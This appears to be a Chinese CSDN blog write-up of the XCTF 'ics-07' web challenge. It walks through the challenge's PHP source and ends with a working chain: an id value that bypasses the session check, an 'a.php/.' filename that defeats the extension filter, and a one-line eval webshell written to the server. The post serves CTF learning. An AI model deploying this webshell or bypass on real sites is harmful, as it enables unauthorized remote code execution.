攻防世界----ics-07

最新推荐文章于 2023-06-10 20:48:42 发布
最新推荐文章于 2023-06-10 20:48:42 发布
阅读量399 收藏 1
点赞数 1
分类专栏: ctf相关 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44418229/article/details/125993834
版权

拿到题目后,一个一个点开

 

直接拿到了源码,源码中php部分分成三个

第一部分,判断有没有page这个参数

<?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }//没有的话进入函数,展示文件,然后进程结束

    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {//如果page有值,并且值等于index.php,就进行else的函数中,重定向到了flag.php页面
      header('Location: ?page=flag.php');
    }

    ?>

//从总体上看,这一部分要求传入一个page参数,只要这个page参数不为index.php即可

 第二部分,如果session有值的话,就可以传入两个参数

<?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;//file会拼接到filename下

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
//对filename进行正则过滤,过滤条件为 . 就是除了换行符外的所有字符,+就是前面一个字符出现任意次
// \. 就是匹配.
// p[3457]?说明 p3,p,p4,p5,p7出现0或一次, 
//整体来说,就是匹配以 .php,.php3,.php4,.php5,.php7,.pht,.phtml 结尾的值
          die("Bad file extension");
       }else{
            chdir('uploaded');//切换目录到 uploaded
           $f = fopen($filename, 'w'); //以w方式打开文件,如果这个文件存在,就删掉,不存在就创建
           fwrite($f, $con);//$f是文件,$con是写进去的内容
           fclose($f);
       }
     }
     ?>

//整体来说,就是过正则,写一句话木马
//因为那个正则匹配了所有.php结尾的文件,因此我们需要用到解析漏洞

第三部分,实现第二部分的关键,就是在于session是有值的,第三部分是给session赋值的

<?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {//通过get方式传入id,这个id需要满足不等1,并且结尾是9,那就1a9,1*9,只要不是正常的数字就行
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);//将传入的id进行字符串解析,防止了sql注入
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);//查询数据库
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){//如果上面result有值的话,session就是true,能够进入第二部分
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

结合上面三个部分,总结就是

1.传入一个page参数,page只要不是等于index.php就好

2.在session为true的情况下,因为没有对con进行过滤,那con直接等于一句话木马即可即

con=<?php+@eval($_POST['666']);?>

因为对file进行过滤了,所以file需要用到解析漏洞的知识点,file=a.php/.

3.为了满足if的判断,id的值不能为一个正常的整数,需要这样:1a9,1iii9,只要1和9之间有东西(并且不能为一个正常的整数,如199)即可

最后的payload如下

这里需要注意一下url,在第二部分中有一个chdir()的函数,这个函数的作用是切换目录

chdir(uploaded)就是切换目录到uploaded,而filename= backup/1.php

所以地址不是 /backup/1.php而是 uploaded/backup/1.php 

 

 

 

jjj34
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界 ics-07 题
qq_43622442的博客
03-05 1470
攻防世界 ics-07 题 写在txt里当笔记太不方便了= =以后还是写这儿吧 1.打开首页是这样子 2.看那个提示,一开始我还以为是直接view-source,没想到那个是个超链接= =点它,出现源码 3.审计一下,利用点在这儿: 4.但是session我们无法自己伪造,看下面的代码: 5.看到sql就想注入= =但是这里宽字节并不行。看一下这句,只要result有值我们就可以上传文件了...
攻防世界-web-fileinclude
最新发布
MateSnake的博客
05-11 313
攻防世界-web-fileinclude
Web安全攻防世界09 ics-07(XCTF)
weixin_42789937的博客
01-29 956
Web安全攻防世界09 ics-07(XCTF),友情提示:攻防世界最近的答题环境不太稳定,我这篇没有做到最后一步...
攻防世界web进阶区ics-07详解
hxhxhxhxx的博客
08-07 1483
攻防世界web进阶区ics-07详解题目详解floatvalsubstr 题目 当然又是熟悉的界面,熟悉的ics题目,熟悉的只能点击一个页面 详解 这里进来有一个view-source 点击看看 是一堆代码。我们进行尝试审计 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]
ics-07—CTF
qq_40646572的博客
04-16 2226
审题 打开链接地址显示如下: 点击项目管理链接,转到目标网页 发现页面有一个view-source按钮(一开始没发现可以点击,打开源代码的时候发现,这是一个链接地址。) view_source页面代码如下: 通过代码审计,发现session会话要有admin用户的信息,才可以进行文件上传的操作。 那么首先需要在session会话中获取admin用户的身份,通过下面的代码审计,发现可以利用id 这个参数。 admin身份绕过 首先看到此处的代码,想着能不能使用sql注入的方式绕过,sql注入没能成功.
攻防世界-file_include
m0_49025459的博客
12-18 6934
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
ics-07
CN天狼
03-01 115
ics-07
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界nice-bgm杂项
11-20
在网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解题技巧...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
信息网络攻防技术-网络安全.ppt
03-01
信息网络攻防技术-网络安全.ppt
攻防世界---fileinclude
m0_72447684的博客
10-11 1180
攻防世界---fileinclude
攻防世界 ics-07
CyhDl666的博客
02-24 481
ics-07 hint:工控云管理系统项目管理页面解析漏洞 进入管理页面是个登录窗 左下角有个查看源码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'.
攻防世界xctf writeup ics-07
qq_43370221的博客
04-20 604
文章目录xctf_writeup_ics-07审计代码审计写入文件代码构造最后的payload菜刀连接的到webshell xctf_writeup_ics-07 审计代码 浏览页面 发现了view-source链接 ,接下来审计代码 if (!isset($_GET[page])) { show_source(__FILE__); die(); }...
攻防世界—file_include
小缪的博客
06-10 2844
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
攻防世界web ics-07 writeup
qq_45837896的博客
07-18 231
熟悉的界面,仍旧是点哪个哪个不能开的选项,只有项目管理能进入 那个view source是可以点的,不是让F12 开始代码审计 page选其它页面直接绕过… 第二段要求admin为true,所以先看第三段 要求传id值,其浮点数不能为1且该字符串最后一位为9. 于是使用1-9或者1/9(此处有疑惑) 进行传值有 admin为true,再次看源码 传file文件名,还有con(文件写入的数据)。 后面进行正则判断,题要从/.开始判断,要想绕过我们可以给文件起名为j.php/. 也就是说在文件名目录下加了个空目
攻防世界-web-ics-07-从0到1的解题历程writeup
CTF小白的博客
04-17 3360
题目分析 首先拿到题目描述:工控云管理系统项目管理页面解析漏洞 找到题目入口 点击view-source对源码进行审计 if (isset($_GET[page]) && $_GET[page] != 'index.php') {      include('f...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jjj34

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值